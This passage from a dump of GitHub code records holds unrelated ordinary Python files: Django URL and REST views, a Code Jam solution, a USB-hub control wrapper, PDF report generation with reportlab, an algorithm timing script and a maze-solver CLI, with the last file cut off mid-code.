'2019/5/12 0009 08:02'\n\nfrom django.urls import path, re_path\n\napp_name = \"schools\"\n\nurlpatterns = [\n\n # 课程学校列表url\n path('list/', SchoolView.as_view(), name=\"school_list\"),\n\n # # 添加我要学习\n # path('add_ask/', AddUserAskView.as_view(), 
name=\"add_ask\"),\n\n # home页面,取纯数字\n re_path('home/(?P\\d+)/', SchoolHomeView.as_view(), name=\"school_home\"),\n\n # 访问课程\n re_path('course/(?P\\d+)/', SchoolCourseView.as_view(), name=\"school_course\"),\n\n # 访问学校描述\n re_path('desc/(?P\\d+)/', SchoolDescView.as_view(), name=\"school_desc\"),\n\n # 访问学校讲师\n re_path('school_lecturer/(?P\\d+)/', SchoolLecturerView.as_view(), name=\"school_lecturer\"),\n\n # # 学校收藏\n # path('add_fav/', AddFavView.as_view(), name=\"add_fav\"),\n\n # 讲师列表\n path('lecturer/list/', LecturerListView.as_view(), name=\"lecturer_list\"),\n\n # 访问学校讲师\n re_path('lecturer/detail/(?P\\d+)/', LecturerDetailView.as_view(), name=\"lecturer_detail\"),\n]\n","repo_name":"Shirlesha/DjangoMooc","sub_path":"mooc/apps/schools/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23456769371","text":"import sys\r\n\r\ndef calc_ovation(smax, ov):\r\n\tif smax == 0:\r\n\t\treturn 0\r\n\r\n\t# find \"gaps\" that require extra people\r\n\tcur_s = 0\r\n\tinvite = 0\r\n\tfor i in xrange(smax+1):\r\n\t\tcur_ov = cur_s + invite\r\n\t\tif cur_ov < i:\r\n\t\t\tinvite += i - cur_ov\r\n\r\n\t\tcur_s += int(ov[i])\r\n\r\n\treturn invite\r\n\r\nif __name__ == '__main__':\r\n\tdata = file(sys.argv[1], \"rb\").read()\r\n\tlines = data.split('\\n')\r\n\tout = file(\"solution.dat\", \"wb\")\r\n\r\n\tfor i in xrange(int(lines[0])):\r\n\t\t(smax, ov) = lines[i+1].split(' ')\r\n\t\tout.write(\"Case #%d: %d\\n\" % (i + 1, calc_ovation(int(smax), ov)))\r\n\r\n\tout.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/611.py","file_name":"611.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10503262549","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 30 09:25:59 2019\n\n@author: Maria\n\"\"\"\n\nimport csv\n\nwith open('sawtooth.txt', 'r') as in_file:\n stripped = (line.strip() for line in in_file)\n lines = (line.split(\",\") for line in stripped if line)\n with open('sawtooth.csv', 'w') as out_file:\n writer = csv.writer(out_file)\n writer.writerows(lines)","repo_name":"marialuquea/Evolutionary_Algorithm","sub_path":"results/testing/txt_to_csv.py","file_name":"txt_to_csv.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4705605206","text":"import re\nimport subprocess\nfrom typing import List, Optional\n\nUHUBCTL_BINARY = \"uhubctl\"\n\n\ndef _uhubctl(args: list = []) -> list:\n cmd = UHUBCTL_BINARY.split(\" \") + args\n result = subprocess.run(cmd, capture_output=True)\n stdout = result.stdout.decode()\n\n if result.returncode != 0:\n stderr = result.stderr.decode()\n\n raise Exception(f\"uhubctl failed: {stderr}\")\n\n return stdout.split('\\n')\n\n\ndef discover_hubs():\n \"\"\"\n Return list of all by uhubctl supported USB hubs with their ports\n\n Returns:\n List of hubs\n\n \"\"\"\n hubs = []\n\n pattern = re.compile(\"Current status for hub ([\\.\\d-]+)\")\n\n for line in _uhubctl():\n regex = pattern.match(line)\n\n if regex:\n hub = Hub(regex.group(1), enumerate=True)\n hubs.append(hub)\n\n return hubs\n\n\nclass Hub:\n def __init__(self, path: str, enumerate: bool = False) -> None:\n \"\"\"\n Create new hub instance\n\n Arguments:\n path: USB hub path identifier\n enumerate: Automatically enumerate 
ports\n \"\"\"\n self.path: str = path\n self.ports: List[Port] = []\n\n if enumerate:\n self.discover_ports()\n\n def add_port(self, port_number: int) -> 'Port':\n \"\"\"\n Add port to hub by port number\n\n Arguments:\n port_number: Indentification number of port\n\n Returns:\n Port\n\n \"\"\"\n port = Port(self, port_number)\n self.ports.append(port)\n\n return port\n\n def add_ports(self, port_start: int, port_end: int):\n \"\"\"\n Add multiple ports to hub\n\n Arguments:\n port_start: First port's indentification number\n port_end: Last port's ndentification number\n \"\"\"\n for port_number in range(port_start, port_end):\n self.add_port(port_number)\n\n def find_port(self, port_number: int) -> Optional['Port']:\n \"\"\"\n Find port by port number\n\n Arguments:\n port_number: Identification number of port to find\n\n Returns:\n Port or None\n \"\"\"\n\n for port in self.ports:\n if port.port_number == int(port_number):\n return port\n\n return None\n\n def discover_ports(self) -> None:\n \"\"\"\n Discover ports for this hub instance\n \"\"\"\n pattern = re.compile(\" Port (\\d+): \\d{4} (power|off)\")\n\n for line in _uhubctl([\"-l\", self.path]):\n regex = pattern.match(line)\n\n if regex:\n port = Port(self, regex.group(1))\n self.ports.append(port)\n\n def __str__(self) -> str:\n return f\"USB Hub {self.path}\"\n\n\nclass Port:\n def __init__(self, hub: Hub, port_number: int):\n \"\"\"\n Create new port instance\n\n Arguments:\n hub: Hub to attach port to\n port_number: Number of port to create\n\n \"\"\"\n self.hub = hub\n self.port_number = int(port_number)\n\n @property\n def status(self) -> bool:\n status = None\n pattern = re.compile(f\" Port {self.port_number}: \\d{{4}} (power|off)\")\n\n args = [\"-l\", self.hub.path, \"-p\", str(self.port_number)]\n for line in _uhubctl(args):\n reg = pattern.match(line)\n\n if reg:\n status = (reg.group(1) == \"power\")\n\n if status is None:\n raise Exception()\n\n return status\n\n @status.setter\n def status(self, status: bool) -> None:\n args = [\"-l\", self.hub.path, \"-p\", str(self.port_number), \"-a\"]\n\n if status:\n args.append(\"on\")\n else:\n args.append(\"off\")\n\n _uhubctl(args)\n\n def __str__(self) -> str:\n return f\"USB Port {self.hub.path}.{self.port_number}\"\n","repo_name":"nbuchwitz/action-playground","sub_path":"uhubctl/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12271361949","text":"import datetime\nimport io\nimport textwrap\n\nfrom reportlab.lib import colors\nfrom reportlab.lib.pagesizes import A4, landscape\nfrom reportlab.lib.styles import ParagraphStyle\nfrom reportlab.lib.units import inch\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfbase.ttfonts import TTFont\nfrom reportlab.platypus import Paragraph, SimpleDocTemplate, Table, TableStyle\n\n\nstyle_heading = ParagraphStyle(\n name=\"Normal\",\n fontName=\"Russian\",\n fontSize=24,\n alignment=1,\n spaceAfter=40,\n spaceBefore=40,\n)\nstyle_main_text = ParagraphStyle(\n name=\"Normal\", fontName=\"Russian\", fontSize=16, spaceAfter=10\n)\n\n\ndef create_person_pdf(info: dict) -> io.BytesIO:\n buffer = io.BytesIO()\n pdfmetrics.registerFont(\n TTFont(\"Russian\", \"./static/fonts/Calibri Light.ttf\")\n )\n doc = SimpleDocTemplate(\n buffer,\n pagesize=A4,\n rightMargin=30,\n leftMargin=30,\n topMargin=20,\n bottomMargin=18,\n title=info[\"full_name\"],\n )\n flowables = []\n 
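# doc.build() renders the flowables in order, so everything below appends paragraphs and tables to this list top-to-bottom.\n    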
flowables.append(Paragraph(info[\"full_name\"], style=style_heading))\n flowables.append(\n Paragraph(\n f\"Дата рождения: {info['birth_date'].strftime('%d.%m.%Y') if info['birth_date'] != datetime.date.min else 'Нет' }\",\n style=style_main_text,\n )\n )\n flowables.append(\n Paragraph(\n f\"Номер телефона: {info['phone_number']}\",\n style=style_main_text,\n )\n )\n flowables.append(\n Paragraph(f\"Ученая степень: {info['degree']}\", style=style_main_text)\n )\n flowables.append(\n Paragraph(\n f\"Ученое звание: {info['academic_title']}\", style=style_main_text\n )\n )\n flowables.append(\n Paragraph(f\"Должность: {info['position']}\", style=style_main_text)\n )\n flowables.append(\n Paragraph(f\"Ставка: {info['rate']}\", style=style_main_text)\n )\n flowables.append(\n Paragraph(\n f\"Нагрузка по ставке в год(час): {info['yearly_load']}\",\n style=style_main_text,\n )\n )\n flowables.append(\n Paragraph(\n f\"Оклад по ставке в месяц(руб.): {info['salary']}\",\n style=style_main_text,\n )\n )\n flowables.append(\n Paragraph(\"Краткая информация по нагрузке\", style=style_heading)\n )\n data = [\n [\n \"Нагрузка в\\nбакалавриате\",\n \"\",\n \"Нагрузка в\\nмагистратуре\",\n \"\",\n \"По ставке\",\n \"Фактическая\",\n ],\n [\n \"Нечетные семестры\",\n \"Четные семестры\",\n \"Нечетные семестры\",\n \"Четные семестры\",\n ],\n [\n info[\"bachelor_odd\"],\n info[\"bachelor_even\"],\n info[\"magistrate_odd\"],\n info[\"magistrate_even\"],\n info[\"yearly_load\"],\n sum(\n [\n info[\"bachelor_odd\"],\n info[\"bachelor_even\"],\n info[\"magistrate_odd\"],\n info[\"magistrate_even\"],\n ]\n ),\n ],\n ]\n style_table_load = TableStyle(\n [\n (\"FONTSIZE\", (0, 0), (-1, -1), 12),\n (\"FONTNAME\", (0, 0), (-1, -1), \"Russian\"),\n (\"SPAN\", (0, 0), (1, 0)),\n (\"SPAN\", (2, 0), (3, 0)),\n (\"SPAN\", (4, 0), (4, 1)),\n (\"SPAN\", (5, 0), (5, 1)),\n (\"GRID\", (0, 0), (-1, -1), 0.5, colors.black),\n (\"ALIGN\", (0, 0), (-1, -1), \"CENTER\"),\n (\"VALIGN\", (0, 0), (-1, -1), \"MIDDLE\"),\n (\"BOTTOMPADDING\", (0, 0), (-1, -1), 10),\n ]\n )\n\n tbl = Table(data)\n tbl.setStyle(style_table_load)\n flowables.append(tbl)\n if info[\"subjects\"]:\n flowables.append(\n Paragraph(\"Информация по предметам\", style=style_heading)\n )\n\n style_table_subjects_params = [\n (\"FONTSIZE\", (0, 0), (-1, -1), 11),\n (\"FONTNAME\", (0, 0), (-1, -1), \"Russian\"),\n (\"GRID\", (0, 0), (-1, -1), 0.5, colors.black),\n (\"ALIGN\", (0, 0), (-1, -1), \"CENTER\"),\n (\"VALIGN\", (0, 0), (-1, -1), \"TOP\"),\n (\"BOTTOMPADDING\", (0, 0), (-1, -1), 10),\n ]\n data = [\n [\n \"Уровень обучения\",\n \"Предмет\",\n \"Тип\\nзанятия\",\n \"Направление\",\n \"Группа\\nСеместр\",\n \"Нагрузка\",\n ]\n ]\n text_width = 15\n subjects = info[\"subjects\"]\n offset = 1\n for study_level, subject_names in subjects.items():\n for subject_name, holding_types in subject_names.items():\n for holding_type, directions in holding_types.items():\n for direction, groups in directions.items():\n data.append(\n [\n study_level,\n textwrap.fill(subject_name, text_width),\n textwrap.fill(holding_type, text_width),\n textwrap.fill(direction, 25),\n \"\\n\".join(groups),\n list(groups.values())[0],\n ]\n )\n offset += len(groups)\n data_ = list(data)\n\n current = 0\n for i, item in enumerate(data_[1:], 1):\n if (\n item[2] == data[current][2]\n and item[1] == data_[current][1]\n and item[0] == data_[current][0]\n ):\n item[2] = \"\"\n else:\n style_table_subjects_params.append(\n (\"SPAN\", (2, current), (2, i - 1))\n )\n current = i\n 
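# Close out the final run: the loop above only emits a SPAN when the cell value changes, so the last stretch of repeated holding-type cells is merged here.\n        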
style_table_subjects_params.append((\"SPAN\", (2, current), (2, i)))\n\n current = 0\n for i, item in enumerate(data_[1:], 1):\n if item[1] == data_[current][1] and item[0] == data_[current][0]:\n item[1] = \"\"\n else:\n style_table_subjects_params.append(\n (\"SPAN\", (1, current), (1, i - 1))\n )\n current = i\n style_table_subjects_params.append((\"SPAN\", (1, current), (1, i)))\n\n current = 0\n for i, item in enumerate(data_[1:], 1):\n if item[0] == data_[current][0]:\n item[0] = \"\"\n else:\n style_table_subjects_params.append(\n (\"SPAN\", (0, current), (0, i - 1))\n )\n current = i\n style_table_subjects_params.append((\"SPAN\", (0, current), (0, i)))\n\n data = data_\n subjects_table = Table(data)\n style_table_subjects = TableStyle(style_table_subjects_params)\n subjects_table.setStyle(style_table_subjects)\n flowables.append(subjects_table)\n\n doc.build(flowables)\n\n return buffer\n\n\ndef create_overview_pdf(info: dict) -> io.BytesIO:\n buffer = io.BytesIO()\n pdfmetrics.registerFont(\n TTFont(\"Russian\", \"./static/fonts/Calibri Light.ttf\")\n )\n doc = SimpleDocTemplate(\n buffer,\n pagesize=landscape(A4),\n rightMargin=1,\n leftMargin=1,\n topMargin=5,\n bottomMargin=5,\n title=\"Общая информация\",\n )\n\n flowables = []\n\n data = [\n [\n \"ФИО\",\n \"Дата\\nрождения\",\n \"Телефон\",\n \"Ученая\\nстепень\",\n \"Ученое\\nзвание\",\n \"Должность\",\n \"Ставка\",\n \"Нагрузка\\nпо ставке\\nв год,\\nчас\",\n \"Оклад\\nпоставке в\\nмесяц,\\nруб.\",\n \"Нагрузка в\\nбакалавриате\",\n \"\",\n \"Нагрузка в\\nмагистратуре\",\n \"\",\n ],\n [\n \"\",\n \"\",\n \"\",\n \"\",\n \"\",\n \"\",\n \"\",\n \"\",\n \"\",\n \"Нечетные семестры\",\n \"Четные семестры\",\n \"Нечетные семестры\",\n \"Четные семестры\",\n ],\n ]\n for item in info:\n values = list(item.values())\n values[1] = values[1].replace(\" \", \"\\n\")\n values[2] = (\n values[2].strftime(\"%d.%m.%Y\")\n if values[2] != datetime.date.min\n else \"Нет\"\n )\n values[3] = \"Нет\" if not values[3] else values[3]\n data.append(values[1:8] + values[9:])\n\n style_table_overview = TableStyle(\n [\n (\"FONTSIZE\", (0, 0), (-1, -1), 9),\n (\"FONTNAME\", (0, 0), (-1, -1), \"Russian\"),\n (\"GRID\", (0, 0), (-1, -1), 0.5, colors.black),\n (\"BOTTOMPADDING\", (0, 0), (-1, -1), 10),\n (\"ALIGN\", (0, 0), (-1, -1), \"CENTER\"),\n (\"VALIGN\", (0, 0), (-1, -1), \"MIDDLE\"),\n (\"SPAN\", (0, 0), (0, 1)),\n (\"SPAN\", (1, 0), (1, 1)),\n (\"SPAN\", (2, 0), (2, 1)),\n (\"SPAN\", (3, 0), (3, 1)),\n (\"SPAN\", (4, 0), (4, 1)),\n (\"SPAN\", (5, 0), (5, 1)),\n (\"SPAN\", (6, 0), (6, 1)),\n (\"SPAN\", (7, 0), (7, 1)),\n (\"SPAN\", (8, 0), (8, 1)),\n (\"SPAN\", (9, 0), (10, 0)),\n (\"SPAN\", (11, 0), (12, 0)),\n ]\n )\n tbl = Table(data)\n tbl.setStyle(style_table_overview)\n flowables.append(tbl)\n\n doc.build(flowables)\n return buffer\n\n\ndef create_study_level_pdf(info: dict) -> io.BytesIO:\n buffer = io.BytesIO()\n pdfmetrics.registerFont(\n TTFont(\"Russian\", \"./static/fonts/Calibri Light.ttf\")\n )\n doc = SimpleDocTemplate(\n buffer,\n pagesize=A4,\n rightMargin=1,\n leftMargin=1,\n topMargin=5,\n bottomMargin=5,\n title=list(info.keys())[0],\n )\n flowables = []\n\n style_table = TableStyle(\n [\n (\"FONTSIZE\", (0, 0), (-1, -1), 16),\n (\"FONTNAME\", (0, 0), (-1, -1), \"Russian\"),\n (\"GRID\", (0, 0), (-1, -1), 0.5, colors.black),\n (\"BOTTOMPADDING\", (0, 0), (-1, -1), 10),\n (\"ALIGN\", (0, 0), (0, -1), \"CENTER\"),\n (\"VALIGN\", (0, 0), (-1, -1), \"MIDDLE\"),\n (\"SPAN\", (0, 0), (-1, 0)),\n ]\n )\n style_table_group = 
TableStyle(\n [\n (\"FONTSIZE\", (0, 0), (-1, -1), 15),\n (\"FONTNAME\", (0, 0), (-1, -1), \"Russian\"),\n (\"GRID\", (0, 0), (-1, -1), 0.5, colors.black),\n (\"BOTTOMPADDING\", (0, 0), (-1, -1), 10),\n (\"ALIGN\", (0, 0), (0, -1), \"CENTER\"),\n (\"VALIGN\", (0, 0), (-1, -1), \"MIDDLE\"),\n (\"SPAN\", (2, 0), (-1, 0)),\n ]\n )\n\n table_width = 5 * [2 * inch]\n for _, item_data in info.items():\n for subject_name, subject_data in item_data.items():\n data = list()\n data.append([textwrap.fill(subject_name, 60), \"\", \"\", \"\"])\n tbl = Table(data, colWidths=table_width)\n tbl.setStyle(style_table)\n flowables.append(tbl)\n for group_name, group_data in subject_data.items():\n for semester, semester_data in group_data.items():\n data = list()\n data.append(\n [\n group_name,\n f\"{semester} Семестр\",\n f\"{list(semester_data.items())[0][1]['number_of_students']} Студент(ов)\",\n \"\",\n ]\n )\n tbl = Table(data, colWidths=table_width)\n tbl.setStyle(style_table_group)\n flowables.append(tbl)\n for holding_type, holding_data in semester_data.items():\n amount = 1\n if (\n holding_type == \"Лабораторная работа\"\n and holding_data[\"number_of_students\"] >= 14\n ):\n amount = 2\n for _ in range(amount):\n style_table_type = TableStyle(\n [\n (\"FONTSIZE\", (0, 0), (-1, -1), 14),\n (\"FONTNAME\", (0, 0), (-1, -1), \"Russian\"),\n (\n \"GRID\",\n (0, 0),\n (-1, -1),\n 0.5,\n colors.black,\n ),\n (\"BOTTOMPADDING\", (0, 0), (-1, -1), 10),\n (\"ALIGN\", (0, 0), (0, -1), \"CENTER\"),\n (\"VALIGN\", (0, 0), (-1, -1), \"MIDDLE\"),\n (\"SPAN\", (2, 0), (-1, 0)),\n ]\n )\n data = list()\n data.append(\n [\n textwrap.fill(holding_type, 20),\n f\"{holding_data['total_time']} Час(ов)\",\n textwrap.fill(holding_data[\"teacher\"], 20)\n if holding_data[\"teacher\"] is not None\n else \"Нет\",\n \"\",\n ]\n )\n if holding_data[\"teacher\"] is not None:\n style_table_type.add(\n \"BACKGROUND\",\n (0, 0),\n (-1, -1),\n colors.palegreen,\n )\n else:\n style_table_type.add(\n \"BACKGROUND\", (0, 0), (-1, -1), colors.pink\n )\n tbl = Table(data, colWidths=table_width)\n tbl.setStyle(style_table_type)\n flowables.append(tbl)\n\n doc.build(flowables)\n return buffer\n","repo_name":"EfremovEgor/AcademyLoadCalculatorDjango","sub_path":"src/website/pdf_converter.py","file_name":"pdf_converter.py","file_ext":"py","file_size_in_byte":14880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9063719933","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n'''\n MAC0122 Principios de Desenvolvimento de Algoritmos\n \n Problema da fatia de soma maxima: \n\n dado: uma lista v de números inteiros;\n encontrar: uma fatia v[e:d] de soma máxima.\n'''\n# importa todas as funções do módul fatiamax\nfrom fatia import *\n\n# para o cronômetro\nimport time\n\n# para o gerador de numeros aleatórios\nimport random\n\n#------------------------------------------------------\n# CONSTANTES\n\n# numero de elementos\nNMIN = 0x0100 # = 4096 \nNMAX = 0x80000#00 # = 134217728 ~ 135 milhões\n\n# semente default para o gerador de no. aleatorios\nSEMENTE = 1234567\n\n# no. 
de experimentos default.\nNO_EXPERIMENTOS = 1\n\n# para testes\nMOSTRE = False\n\n#\nMIN = -4096\nMAX = 4096\n\n#------------------------------------------------------\ndef main(argv=None):\n #------------------------------------------------\n # valores default para os parâmetros\n semente = SEMENTE # para o gerador de numeros aleatorios \n no_experimentos = 1 # número de repeticoes de uma função\n max = NMAX # numero maximo de elementos da lista \n min = NMIN # numero mínimo de elementos na lista\n \n # inicialize a semente do gerador de numeros aleatorios \n random.seed(semente)\n\n # crie uma vetor com lista de max ints\n print(\"Criando lista com %d ints\" %max)\n v = lista_int_rand(max)\n print(\"Lista criada.\\n\")\n\n # para teste\n if MOSTRE:\n print(\"semente = %d\" %(semente))\n mostre_lista(v)\n\n # imprima cabeçalho \n print(\" n \", end=\"\")\n print(\" div_conq \", end=\"\")\n print(\" fatia_max \\n\", end=\"\")\n\n n = min\n while n <= max:\n # cronometre algoritmo por divisão e conquista\n inicio = time.time()\n soma_max1, e1, d1 = fatia_max_div_conq(0, n, v)\n fim = time.time()\n t1 = fim-inicio\n \n # cronometre algoritmo quadrático\n inicio = time.time()\n soma_max2, e2, d2 = fatia_max(0, n, v)\n fim = time.time()\n t2 = fim-inicio\n\n print(\"%10d\" %n, end=\"\")\n print(\"%11.2fs \"%t1, end=\"\")\n print(\"%11.2fs\\n\"%t2, end=\"\")\n\n if soma_max1 != soma_max2:\n print(\"SOCORRO! soma_max1 = %s != %s soma_max2\"%(soma_max1,soma_max2))\n \n # proximo valor de n\n n *= 2\n\n#------------------------------------------------------------\n# F U N C O E S A U X I L I A R E S \n#------------------------------------------------------------\ndef lista_int_rand(n):\n '''(int) -> list\n\n Recebe um inteiro não nagtivo n e cria e retorna uma \n lista com n número inteiros gerados aleatoriamente no\n intervalo [MIN,MAX[.\n '''\n lista = []\n for i in range(n):\n valor = random.randrange(MIN,MAX)\n lista.append(valor)\n return lista\n\n#------------------------------------------------------------\ndef mostre_lista(v):\n '''(list) -> None\n\n Recebe uma lista v de números inteiros e mostra o seu conteudo\n de uma maneira conveniente.\n '''\n print(\"Lista:\")\n n = len(v)\n for i in range(n):\n print(\"%8d: %d\" %(i,v[i]))\n\n\n#----------------------------------------------------------- \nif __name__ == \"__main__\":\n main()\n \n'''\n n div_conq fatia_max \n 256 0.00s 0.00s\n 512 0.00s 0.01s\n 1024 0.00s 0.04s\n 2048 0.00s 0.16s\n 4096 0.01s 0.62s\n 8192 0.02s 2.45s\n 16384 0.04s 9.82s\n 32768 0.08s 39.37s\n 65536 0.16s 161.20s\n 131072 0.33s 663.06s\n 262144 0.68s 2581.96s\n 524288 1.40s 10163.39s\n'''\n \n \n","repo_name":"HelloWounderworld/Review-Python","sub_path":"O-que-Fiz-Na-Faculdade/MAC2/EPs-MAC2/EPX2/Cronometro.py","file_name":"Cronometro.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"37108707677","text":"\"\"\"\nCLI entry point for the maze solver.\n\"\"\"\n\nimport argparse\n\nfrom character.bfspentti import BFSPentti\nfrom character.randompentti import RandomPentti\nfrom character.righthandpentti import RightHandPentti\nfrom character.usablepentti import UsablePentti\nfrom map.map import Map\nfrom map.maptoimage import MapToImage\n\n\nparser = argparse.ArgumentParser(description=\"CLI to helping Pentti escape his doom.\")\nparser.add_argument(\n \"-m\",\n \"--map\",\n type=str,\n required=True,\n dest=\"map\",\n help=\"Path to a map text 
file\",\n)\nparser.add_argument(\n \"-p\",\n \"--pentti\",\n required=True,\n choices=[\"random\", \"righthandrule\", \"bfs\"],\n dest=\"pentti\",\n help=\"Which solving algorithm to use\",\n)\nparser.add_argument(\n \"-l\",\n \"--limit\",\n required=False,\n type=int,\n dest=\"limit\",\n help=\"Limit Pentti's available moves\",\n default=1000,\n)\nparser.add_argument(\n \"-i\",\n \"--image\",\n action=\"store_true\",\n dest=\"image\",\n help=\"Prints the solution as 'solution.png'\"\n)\nparser.add_argument(\n \"-g\",\n \"--gif\",\n action=\"store_true\",\n dest=\"gif\",\n help=\"Prints the solution steps as 'solution.gif'\"\n)\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n\n pentti: UsablePentti = None\n map = Map(args.map)\n\n if args.pentti == \"random\":\n pentti = RandomPentti(map)\n if args.pentti == \"righthandrule\":\n pentti = RightHandPentti(map)\n if args.pentti == \"bfs\":\n pentti = BFSPentti(map)\n\n pentti.escape_maze(args.limit)\n\n if args.gif:\n maptoimage = MapToImage()\n maptoimage.convert(pentti._history + [pentti._map])\n maptoimage.save_images_as_gif()\n\n if args.image:\n maptoimage = MapToImage()\n maptoimage.convert([pentti._map])\n maptoimage.save_last_png()\n","repo_name":"Mnsk44/pentti-the-escape-artist","sub_path":"escapeartist/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27494096099","text":"import structlog\nfrom django.db import models\nfrom django.db.models.expressions import RawSQL\nfrom django.db.models.functions import Coalesce\nfrom django.db.models.functions import Extract\nfrom django.db.models.functions import JSONObject\nfrom django.db.models.functions import Now\nfrom django_filters.rest_framework import BaseInFilter\nfrom django_filters.rest_framework import CharFilter\nfrom django_filters.rest_framework import DateTimeFromToRangeFilter\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom django_filters.rest_framework import FilterSet\nfrom django_filters.rest_framework import RangeFilter\nfrom rest_framework import mixins\nfrom rest_framework import status\nfrom rest_framework.decorators import action\nfrom rest_framework.filters import OrderingFilter\nfrom rest_framework.viewsets import GenericViewSet\n\nfrom api.errors import AlreadyExistsError\nfrom api.errors import BadRequestError\nfrom api.models import ComputePlan\nfrom api.models import ComputeTask\nfrom api.models import ComputeTaskInputAsset\nfrom api.models import ComputeTaskOutputAsset\nfrom api.models.function import FunctionInput\nfrom api.models.function import FunctionOutput\nfrom api.serializers import ComputeTaskInputAssetSerializer\nfrom api.serializers import ComputeTaskOutputAssetSerializer\nfrom api.serializers import ComputeTaskSerializer\nfrom api.views.filters_utils import CharInFilter\nfrom api.views.filters_utils import ChoiceInFilter\nfrom api.views.filters_utils import MatchFilter\nfrom api.views.filters_utils import MetadataFilterBackend\nfrom api.views.utils import ApiResponse\nfrom api.views.utils import get_channel_name\nfrom api.views.utils import validate_key\nfrom api.views.utils import validate_metadata\nfrom libs.pagination import DefaultPageNumberPagination\nfrom orchestrator import computetask\nfrom orchestrator.resources import TAG_KEY\nfrom substrapp.orchestrator import get_orchestrator_client\n\nlogger = structlog.get_logger(__name__)\n\n\ndef _register_in_orchestrator(tasks_data, 
channel_name):\n \"\"\"Register computetask in orchestrator.\"\"\"\n batch = {}\n for task_data in tasks_data:\n orc_task = {\n \"key\": task_data[\"key\"],\n \"function_key\": task_data.get(\"function_key\"),\n \"compute_plan_key\": task_data[\"compute_plan_key\"],\n \"inputs\": task_data.get(\"inputs\", []),\n \"outputs\": task_data.get(\"outputs\", {}),\n \"metadata\": task_data.get(\"metadata\") or {},\n }\n\n validate_metadata(orc_task[\"metadata\"])\n orc_task[\"metadata\"][TAG_KEY] = task_data.get(\"tag\") or \"\"\n\n if \"worker\" in task_data:\n orc_task[\"worker\"] = task_data[\"worker\"]\n\n batch[orc_task[\"key\"]] = orc_task\n\n with get_orchestrator_client(channel_name) as client:\n return client.register_tasks({\"tasks\": list(batch.values())})\n\n\ndef task_bulk_create(request):\n \"\"\"Create a batch of tasks (with various categories) with same CP keys\n\n The workflow is composed of several steps:\n - Register assets in the orchestrator.\n - Save metadata in local database.\n \"\"\"\n\n # Step1: register asset in orchestrator\n compute_plan_keys = [task[\"compute_plan_key\"] for task in request.data[\"tasks\"]]\n compute_plans = ComputePlan.objects.filter(key__in=compute_plan_keys)\n if len(compute_plans) == 0:\n raise BadRequestError(\"Invalid compute plan key\")\n if len(compute_plans) > 1:\n raise BadRequestError(\"All tasks should have the same compute plan key\")\n compute_plan = compute_plans[0]\n orc_data = _register_in_orchestrator(request.data[\"tasks\"], get_channel_name(request))\n\n # Step2: save metadata in local database\n data = []\n for task in orc_data:\n api_data = computetask.orc_to_api(task)\n api_data[\"channel\"] = get_channel_name(request)\n api_serializer = ComputeTaskSerializer(data=api_data)\n try:\n api_serializer.save_if_not_exists()\n except AlreadyExistsError:\n # May happen if the events app already processed the event pushed by the orchestrator\n compute_task = ComputeTask.objects.get(key=api_data[\"key\"])\n api_task_data = ComputeTaskSerializer(compute_task).data\n else:\n api_task_data = api_serializer.data\n data.append(api_task_data)\n\n compute_plan.update_dates()\n compute_plan.update_status()\n return ApiResponse(data, status=status.HTTP_200_OK)\n\n\ndef validate_status_and_map_cp_key(key, values):\n if key == \"status\":\n try:\n for value in values:\n getattr(ComputeTask.Status, value)\n except AttributeError as e:\n raise BadRequestError(f\"Wrong {key} value: {e}\")\n elif key == \"compute_plan_key\":\n key = \"compute_plan_id\"\n return key, values\n\n\nclass ComputePlanKeyOrderingFilter(OrderingFilter):\n \"\"\"Allow ordering on compute_plan_key.\"\"\"\n\n def get_ordering(self, request, queryset, view):\n ordering = super().get_ordering(request, queryset, view)\n return [v.replace(\"compute_plan_key\", \"compute_plan_id\") for v in ordering]\n\n\nclass ComputeTaskMetadataFilter(MetadataFilterBackend):\n def _apply_filters(self, queryset, filter_keys):\n return queryset.annotate(\n metadata_filters=JSONObject(\n **{\n f\"{filter_key}\": RawSQL(\n \"api_computetask.metadata ->> %s\",\n (filter_key,),\n )\n for filter_key in filter_keys\n }\n )\n )\n\n\nclass ComputeTaskFilter(FilterSet):\n creation_date = DateTimeFromToRangeFilter()\n start_date = DateTimeFromToRangeFilter()\n end_date = DateTimeFromToRangeFilter()\n status = ChoiceInFilter(\n field_name=\"status\",\n choices=ComputeTask.Status.choices,\n )\n compute_plan_key = CharInFilter(field_name=\"compute_plan__key\")\n function_key = 
